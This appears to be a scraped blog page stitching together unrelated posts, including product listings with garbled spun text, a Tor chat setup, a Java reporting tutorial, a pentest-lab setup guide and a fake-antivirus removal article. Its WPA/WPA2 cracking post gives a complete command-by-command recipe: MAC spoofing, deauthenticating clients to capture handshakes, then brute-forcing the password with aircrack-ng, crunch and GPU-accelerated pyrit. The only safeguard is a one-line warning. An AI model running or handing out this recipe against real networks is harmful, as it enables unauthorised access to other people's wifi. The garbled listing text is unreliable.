Computer system Pile of cash with respect to KENSINGTON COMPUTER K64343 MICROSAVER DS NOTEBOOK LOCK

Bundle for KENSINGTON COMPUTER K64343 MICROSAVER DS NOTEBOOK LOCK Vendor

Reviews: KENSINGTON COMPUTER K64343 MICROSAVER DS NOTEBOOK LOCK

KENSINGTON COMPUTER K64343 MICROSAVER DS NOTEBOOK LOCK

KENSINGTON COMPUTER K64343 MICROSAVER DS NOTEBOOK LOCK Car dealer

Protect your valuable laptop from theft with the MicroSaverA DS laptop Lock from KensingtonA. It features a carbon tempered steel cable, external braided steel sheath. Its T-bar locking mechanism that provides you a strong, secure lock in a one piece design. The 6 ft security cable is carbon tempered and has an external steel braided sheath. The easy-to-install lock can be used in the office, at the airport or just about anywhere for comprehensive theft-protection. The laptop shown in the image is sold separately.

Read more »
Read More..

Logitech S220 2 1 Speaker System with Subwoofer

Logitech S220 2.1 Speaker System with Subwoofer Review




Logitech S220 2.1 Speaker System with Subwoofer



Logitech S220 2.1 Speaker System with Subwoofer Feature


  • 17 Watts RMS; 34 Watts Peak Power




"Buy Logitech S220 2.1 Speaker System with Subwoofer" Overview


The new Logitech S-220 Speaker System contains several upgrades to its predecessor, the S-200 Speaker System. Unlike the S-200, the new S-220 encompasses increased usability with a newly styled control base to manage improved acoustics, volume and VoIP connectivity. Bass tuning by the end user is often permanent once a setting is established. With the end-user experience at the forefront of Logitechs design strategy to minimize desk clutter the S-220 bass control is located directly on the subwoofer. This allows the end user to tune the speaker system with no concerns for any accidental control adjustments. Finally, the newly designed S-220 advantages improved acoustics for a smoother, rich experience to enjoy music, VoIP discussions or playing video games.You will not be disappointed with Logitech S220 2.1 Speaker System with Subwoofer






Related Products




For more INFORMATION


....Check price...Product Rating..Customer Reviews











Read More..

HOWTO LimeChat with Tor on Mac OS X 10 8 4

Step 1 :



Download and install the LimeChat from Apple Apps Store on you Mac.



Step 2 :



LimeChat >> Preferences >> Interface >> Layout of the main window >> 3 Columns

LimeChat >> Server >> Server Properties >> General >> Network name -- TorifiedFreenode

LimeChat >> Server >> Server Properties >> General >> Server -- 10.40.40.40

LimeChat >> Server >> Server Properties >> General >> Port -- 6667

LimeChat >> Server >> Server Properties >> General >> Nickserv Pasword -- [your SASL password]

LimeChat >> Server >> Server Properties >> General >> Use SASL >> selected



LimeChat >> Server >> Server Properties >> Details >> Proxy >> SOCKS 5 proxy

LimeChat >> Server >> Server Properties >> Details >> Homename >> 127.0.0.1

LimeChat >> Server >> Server Properties >> Details >> Port >> 9150



LimeChat >> Server >> Server Properties >> On Login >> #infosec-ninjas [add some channels]



Step 3 :



Go to Tor official website to download and install "Tor Browser Bundle for 64-Bit Mac".



Step 4 :



Run "TorBrowser_en-US".



Vidalia Control Panel >> Settings >> Advanced >> Edit current torrc



Append the following :



MapAddress 10.40.40.40 p4fsi4ockecnea7l.onion



Select it and then "Apply selection only" >> OK



Step 5 :



Close LimeChat and Stop Tor as well as close Vidalia Control Panel.



Then restart Vidalia Control Panel and LimeChat. TorBrowser will start up too.



Thats all! See you.




Read More..

JasperReports 5 0 tutorial with iReport 5 0 part 2



The part 1 was a comprehensive beginner style  Jasper Reports tutorial. This extends that to demonstrate how to pass parameters via a Map using name/value pairs to the Jasper Reports.


Step 1: Add a new custom parameter named "footerText" to display some value in the page footer section. Right-click on "Parameters" and select "Add Parameter" and then rename it to "footerText" as shown below. Also, note than the Text Field in the page footer is mapped to $P{footerText} by right clicking on the "Text Field" and then select "Edit expression" to select the parameter "footerText" from the list.





Step 2: Compile this to the jrxml file and then you can pass the value for "footerText" via Java as shown below in the Main.java file. Take note of the getParameters( ) method.

package com.mycompany.app.jasper; import java.io.IOException; import java.io.InputStream; import java.util.Collection; import java.util.LinkedList; import java.util.List; import net.sf.jasperreports.engine.JRException; import net.sf.jasperreports.engine.JasperCompileManager; import net.sf.jasperreports.engine.JasperFillManager; import net.sf.jasperreports.engine.JasperPrint; import net.sf.jasperreports.engine.JasperReport; import net.sf.jasperreports.engine.data.JRBeanCollectionDataSource; import net.sf.jasperreports.engine.design.JasperDesign; import net.sf.jasperreports.engine.xml.JRXmlLoader;
package com.mycompany.app.jasper;

import java.io.IOException;
import java.io.InputStream;
import java.util.Collection;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;

import net.sf.jasperreports.engine.JRException;
import net.sf.jasperreports.engine.JasperCompileManager;
import net.sf.jasperreports.engine.JasperFillManager;
import net.sf.jasperreports.engine.JasperPrint;
import net.sf.jasperreports.engine.JasperReport;
import net.sf.jasperreports.engine.data.JRBeanCollectionDataSource;
import net.sf.jasperreports.engine.design.JasperDesign;
import net.sf.jasperreports.engine.xml.JRXmlLoader;
import net.sf.jasperreports.view.JasperViewer;

public class Main
{

public static JasperDesign jasperDesign;
public static JasperPrint jasperPrint;
public static JasperReport jasperReport;
public static String reportTemplateUrl = "person-template.jrxml";

public static void main(String[] args) throws IOException
{
try
{
InputStream resourceAsStream = Thread.currentThread().getContextClassLoader()
.getResourceAsStream(reportTemplateUrl);
//get report file and then load into jasperDesign
jasperDesign = JRXmlLoader.load(resourceAsStream);
//compile the jasperDesign
jasperReport = JasperCompileManager.compileReport(jasperDesign);
//fill the ready report with data and parameter
jasperPrint = JasperFillManager.fillReport(jasperReport, getParameters(),
new JRBeanCollectionDataSource(
findReportData()));
//view the report using JasperViewer
JasperViewer.viewReport(jasperPrint);
}
catch (JRException e)
{
e.printStackTrace();
}
}

private static Collection findReportData()
{
//declare a list of object
List<Person> data = new LinkedList<Person>();
Person p1 = new Person();
p1.setFirstName("John");
p1.setSurname("Smith");
p1.setAge(Integer.valueOf(5));
data.add(p1);
return data;
}

private static Map<String, Object> getParameters()
{
Map<String, Object> params = new HashMap<String, Object>();
params.put("footerText", "Just to demonstrate how to pass parameters to report");
return params;
}

}


Step 3: Finally, run the Main.java to see the value "Just to demonstrate how to pass parameters to report" in the report footer. The parameters are handy to pass any arbitary name/value pairs to the report.





Read More..

HOWTO Setting up a Penetration environment with VirtualBox

*** CAUTION : This tutorial is written for Penetration Test only. Otherwise, you may be arrested if you attack/intrude any other network/computer without authorization. ***



Software :

Back|Track 4 R1

Ubuntu 10.10 Desktop

VirtualBox 3.2.10 r66523



Hardware :

Lenovo ThinkPad X200 with 4GB RAM and 80GB SSD



Lenovo ThinkPad X200 is installed Ubuntu 10.10 Desktop edition. On which, installs VirtualBox.



Go to the Oracle VM VirtualBox site to download the VirtualBox :

http://dlc.sun.com/virtualbox/vboxdownload.html#linux



(A) Create Back|Track virtual machine :



Select at least 8GB virtual hard drive place and 512MB RAM for the Back|Track. The first network adapter is set to "NAT" while the second is set to "Host-Only".



Boot up Back|Track from the VirtualBox and click on "install.sh" to install Back|Track.



Login for further setting. The username is "root" and the password is "toor".



Step 1 :



After the installation, you may execute the following command to fix the screen size to 800x600.



fix-splash800



Then, change the password of the root when necessary. Otherwise, the username is "root" while the password is "toor".



Execute the following command to make Back|Track to start network interface and X.org when bootup each time.



kate /root/.bash_profile



Append the following lines :



start-network

startx




Step 2 :



To install VirtualBox Additions when necessary via "Konqueror" -- "Storage Media" -- "media:/hdc".



bash VBoxLinuxAdditions-x86.run



Step 3 :



apt-get -y update

apt-get -y upgrade




Step 4 :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "Fast Track". Select "Fast-Track Interactive" and choose "1".



Step 4a :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "ExploitDB". Select "Update Exploitdb".



Step 4b :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "Social Engineering Toolkit". Select "S.E.T-Update".



Step 5 :



At the terminal, execute the following command :



airodump-ng-oui-update



Step 6 :



Go to "Menu" -- "BackTrack" -- "Vulnerability Identification" -- "OpenVAS" -- "OpenVAS NVT Sync".



Step 7 :



Update the Add-ons of Firefox.



Step 8 :



apt-get -y install crark

apt-get -y install wbox

apt-get -y install vlc




Step 9 :



Update the Framework. However, it will take several hours.



cd /pentest/exploits/framework3/

svn up




Step 10 :



Reboot the system.



(B) Create Metasploitable virtual machine (Optional)



Go to the following link to download the "Metasploitable" which is an Ubuntu 8.04 server with some flaws.



http://blog.metasploit.com/2010/05/introducing-metasploitable.html



Set the downloaded Metasploitable as virtual hard drive at VirtualBox. The network adapter is set to "Host-Only". The virtual hard disk space is at least 8GB and 512MB RAM for the Metasploitable.



(C) The final



Now, the IP address of eth0 of Metasploitable is similar to 192.168.56.101. The IP address of eth0 and eth1 of Back|Track are similar to 10.0.2.15 and 192.168.56.102 respectively.



You may require to execute the following command at Back|Track in order to see the two network interfaces and their IPs.



/etc/init.d/networking restart



Back|Track can access (or ping) Metasploitable via IP address. Back|Track can surf the internet but Metasploitable cannot.



At last, your penetration environment is set up.



(D) Free Tutorials



(1) Metaploit Unleashed

(2) Fast-Track

(3) Social-Engineer Tootkit

(4) Got Milk?

(5) How to Metasploit Beginner to Advanced (Video)



(E) Non-free Training



Offensive Security



(F) Resources



(1) Exploits Database

(2) Metaploit Blog

(3) Offensive security Blog

(4) Yet another Back|Track in Gnome

(5) Metasploit



Thats all! See you.
Read More..

How to Remove Antivirus Live Uninstall Antivirus Live Easily With Removal Instructions

What is Antivirus Live? Its frighteningly powerful at the moment. This fake antivirus software makes it nearly impossible to run your computer normally. It blocks your programs from operating, and it starts itself automatically every time Windows starts. This virus is infected through a Trojan, meaning tracing its entrance is difficult to do. A unique and annoying aspect of Antivirus Live is the way it affects your proxy settings and makes it nearly impossible to run Internet Explorer. Antivirus Live will try to rob you of your money for what it claims to be "fully activated" software. Its bogus. You have to remove this virus quickly before any irreperable harm is done.
The tell-tale signs of a fake antivirus infection are normally pop-ups, computer slowdown, and fake scans that start every time you boot your computer. Antivirus Live is no different. When it is running you will get all of the pop-ups, security alerts, warnings, and taskbar messages. You will receive official looking Windows warnings that will oddly suggest that you install Antivirus Live in particular. Normal Windows software will never recommend a particular program like this fake version does. This fake antivirus software will do whatever it can to scare you into shelving out your money. Dont fall for it!
How Do I Uninstall Antivirus Live?
To remove this software you wont be able to simply Add/Remove it. Deleting the program files wont be enough, either. This rogue software embeds itself into your system, into your registry, and disrupts your proxy settings. You can consider trying to remove it yourself, also known as manual removal, if you consider yourself an IT pro or a bigtime techie. The reason is that editing your registry is no laughing matter, as one mistake can conclude in large fees at a technicians shop or a computer that wont start up anymore. If youre a pro, youll have to delete all related DLL and LNK files in your LOCAL_HKEY_USER

Article Source: http://EzineArticles.com/3407009
Read More..

HOWTO WPA WPA2 cracking with Back Track 5

Dont crack any wifi router without authorization; otherwise, you will be put into the jail.



(A) General Display card



Step 1 :



airmon-ng



The result will be something like :



Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]






Step 2 :



airmon-ng start wlan0



Step 3 (Optional) :



Change the mac address of the mon0 interface.



ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up




Step 4 :



airodump-ng mon0



Then, press "Ctrl+c" to break the program.



Step 5 :



airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0



*where -c is the channel

           -w is the file to be written

           --bssid is the BSSID



This terminal is keeping running.



Step 6 :



open another terminal.



aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0



*where -a is the BSSID

           -c is the client MAC address (STATION)



Wait for the handshake.



Step 7 :



Use the John the Ripper as word list to crack the WPA/WP2 password.



aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs



Step 8 (Optional) :



If you do not want to use John the Ripper as word list, you can use Crunch.



Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/



Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download



tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install




/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



(B) nVidia Display Card with CUDA



If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.



Step a :



airmon-ng



The result will be something like :



Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]






Step b :



airmon-ng start wlan0



Step c (Optional) :



Change the mac address of the mon0 interface.



ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up




Step d :



airodump-ng mon0



Then, press "Ctrl+c" to break the program.



Step e :



airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0



Step f :



open another terminal.



aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0



*where -a is the BSSID

           -c is the client MAC address (STATION)



Wait for the handshake.



Step g :



If the following programs are not yet installed, please do it.



apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy



Step h :



Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/



Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download



tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install




Step i :



Go to the official site of pyrit.



http://code.google.com/p/pyrit/downloads/list



Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).



tar -xzvf pyrit-0.4.0.tar.gz

cd pyrit-0.4.0

python setup.py build

sudo python setup.py install




tar -xzvf cpyrit-cuda-0.4.0.tar.gz

cd cpyrit-cuda-0.4.0

python setup.py build

sudo python setup.py install




Step j :



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



Step k (Optional) :



If you encounter error when reading the wpacrack-01.cap, you should do the following step.



pyrit -r wpacrack-01.cap -o new.cap stripLive



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



Step l :



Then, you will see something similar to the following.



Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+



Parsing file new.cap (1/1)...

Parsed 71 packets (71 802.11-packets), got 55 AP(s)



Tried 17960898 PMKs so far; 17504 PMKs per second.




Remarks :



If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.



To test if your wireless card (either USB or PCI-e) can do the injection or not :



airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0



Make sure pyrit workable on your system :



pyrit list_cores



Thats all! See you.
Read More..

Recursion in Java with example – Programming Techniques Tutorial

Recursion is one of the tough programming technique to master. Many programmers working on both Java and other programming language like C or C++ struggles to think recursively and figure out recursive pattern in problem statement, which makes it is one of the favorite topic of any programming interview. If you are new in Java or just started learning Java programming language and you are looking for some exercise to learn concept of recursion than this tutorial is for you. In this programming tutorial we will see couple of example of recursion in Java programs and some programming exercise which will help you to write recursive code in Java e.g. calculating Factorial, reversing String and printing Fibonacci series using recursion technique. For those who are not familiar with recursion programming technique here is the short introduction: "Recursion is a programming technique on which a method call itself to calculate result". Its not as simple as it look and mainly depends upon your ability to think recursively. One of the common trait of recursive problem is that they repeat itself, if you can break a big problem into small junk of repetitive steps then you are on your way to solve it using recursion.
Read more »
Read More..

Blog Archive

Powered by Blogger.